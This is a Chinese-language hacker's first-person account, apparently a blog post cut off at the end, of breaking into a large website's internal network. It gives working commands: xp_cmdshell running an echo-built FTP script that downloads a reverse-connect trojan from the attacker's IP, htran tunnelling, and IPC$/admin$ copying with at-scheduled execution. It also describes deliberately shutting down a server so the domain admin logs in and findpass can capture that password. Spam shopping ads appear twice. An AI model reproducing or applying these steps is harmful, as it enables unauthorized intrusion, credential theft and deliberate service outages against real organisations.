社會工程學的思維突破內網.doc

社會工程學的思維突破內網 文/KYO 前些天剛收到e-mail，得知我通過了CISP的考試。高興之余把我滲透一個全世界排名100多名的大站的過程寫出來，也好和大家一起學習，共同進步。 至于入侵的原因，我也不多說了。目標是mms.*.com，是用aspx寫的，先用iiswrite.exe檢測一下，結果如下：通過檢測結果，大概可以了解到目標WEB服務器是win2000，我認為至少比win2003搞起來輕松點。不過通過域名查詢知道，服務器IP沒有綁定任何國際域名，首先旁注是沒轍了。再從掃描的端口上來看，只開了21和80，只有ftp服務和web對外開放，肯定做了安全策略和安裝了防火墻。既然開了FTP，就登陸試試看看返回的信息是什么吧。220 hw-9ab3d94fe590 Microsoft FTP Service (Version 5.0).從以上信息得知，服務器十有八九用的是微軟自帶的FTP（至于是否改了binner，盡量先不考慮），至少想從webshell上利用serv-u提升權限是不可能的了。另外還有一點信息hw-9ab3d94fe590即為該機器的機器名。那么FTP的帳戶信息和該服務器的帳戶應該是一一對應的，暴力破解的苦力活我是不做了，意義不大。然后再看80，aspx的，首先注入是找不到了，后臺猜了半天也沒猜出來，看來主動進攻不太好進行。*這里插播個廣告，黑友們請無視，只是為朋友的網站能被搜索引擎收錄，多加點流量。返利網,淘你喜歡,淘寶返利,淘寶返現購物。* 換個思路吧，看看他的C類段有沒有弱弱的機子，經過掃描知道，那個C類網段基本都是這個網站的分站。經過艱苦的尋找和測試，利用一個掃描網站多級目錄頁面的辦法找到一個上傳頁面，后面的事情大家都知道怎么做的，抓包，改數據，再用NC提交。不過第一次沒有成功，提示寫入失敗，既然默認的目錄不可寫，那我們在網站上隨便再找一個認為可寫的目錄再測試，經過查找源代碼里面的信息，找到一個圖片目錄，然后再修改包的內容，再用NC提交，OK，這次成功了。拿到了他C類段一個站的WEBSHELL。通過服務器組建探測，知道他沒有禁用WScript.Shell那么我們可以了解到很多信息。通過ipconfig /all 了解到他們的站基本上都是內網的服務，然后把一些服務的端口映射出來的。Net start發(fā)現本機開了終端和radmin，但是我們連不上的。再進入系統目錄下，看他打補丁的情況，通過補丁編號，又知道他系統已經打上最新補丁。就算他們內網之間開了445，MS05039也用不了。再通過net localgroup administrators得到從這里我看到了希望，因為系統管理員有域管理員帳號，那么我們不管拿到哪臺機子的系統權限，如果域管理員在線，findpass就可以得到域管理員密碼了。好了，準備工作做了這么多，下面開始提升權限。幸好他網站數據庫用的是ms sqlserver，找到Web.config,我們得到了sqlserver的用戶名和密碼，再利用2006自帶的微軟數據庫查看/操作器連接數據庫服務器。轉到命令執(zhí)行那里，exec master.dbo.xp_cmdshell “ping myip” ,馬上看到我的天網有反映了，那么至少知道xp_cmdshell是可以用的。下面就簡單了。利用以下腳本echo open myipkk1.txtecho kyokk1.txtecho kyo327kk1.txtecho get muma.exekk1.txtecho byekk1.txtftp -s:kk1.txt向數據庫服務器上傳我的反連的馬。這樣我們現在就拿到了數據庫服務器的系統權限?？梢钥吹轿覉?zhí)行query user,顯示沒有用戶。那怎么辦？嗅探吧。不能遠程登陸3389，我用htran.exe轉出來再登陸。登上去以后準備再傳一個cain，嗅探目標的21端口，雖然希望不大，可這也是沒有辦法的辦法。為了不把我的shell弄死，我echo一個bat然后用at命令執(zhí)行。具體語句為：echo htran -slave myip 3389k.bat然后我在本機監(jiān)聽htran -listen 83 3389*這里插播個廣告，黑友們請無視，只是為朋友的網站能被搜索引擎收錄，多加點流量。返利網,淘你喜歡,淘寶返利,淘寶返現購物。*等任務時間一到，我馬上打開終端登陸器，連接，輸入我剛加的用戶名密碼以后，卻彈出以下畫面：暈了，看來他們最后還有一手，哎，登陸終端又失敗了。 想了許久，感覺突破口就是怎么才能讓域管理登陸，我想如果他們網頁壞了，他們肯定會去維護的，不過他也可以登陸ftp維護啊。最終的辦法只有一個，先把得到WEBSHELL那個站的首頁改名（呵呵，我不做破壞的），然后直接shutdown掉那臺服務器。這樣他就不得不登陸了。我是在半夜4點多做完了這件事，一直熬到8點鐘，再刷新那個網站，發(fā)現已經恢復了，馬上用我的后門登陸到他的CMD下的shell，執(zhí)行query user,果然有域管理員在線，接著findpass，這就是我利用社會工程學拿到了域管理員密碼的真實過程。并且我半個小時后再登陸后門query user，就發(fā)現沒有用戶了，看來他們的管理員也懂一點安全知識。幸虧我做的及時啊。拿到域管理員密碼再進那個目標機就簡單多了。過程就是利用以下語句Net use 92ipc$ “pass” /user:domainadministrator先和目標機建立ipc連接。這里肯定有人問了，你怎么得到目標機的內網IP的。其實前面已經做了鋪墊，我由ftp返回的binner信息知道了目標機的機器名，那么我內網CMDSHELL下直接ping機器名就OK了。Copy muma.exe 92admin$system32muma.exe把木馬copy到目標機Net time 92得到目標機的時間At 92 time muma.exe執(zhí)行我的反連木馬到此為止，我的這次入侵就結束了。說到底如何讓域管理員登陸是最重要的，不然我的一切勞動都成為炮灰。其實社會工程學博大精深，我這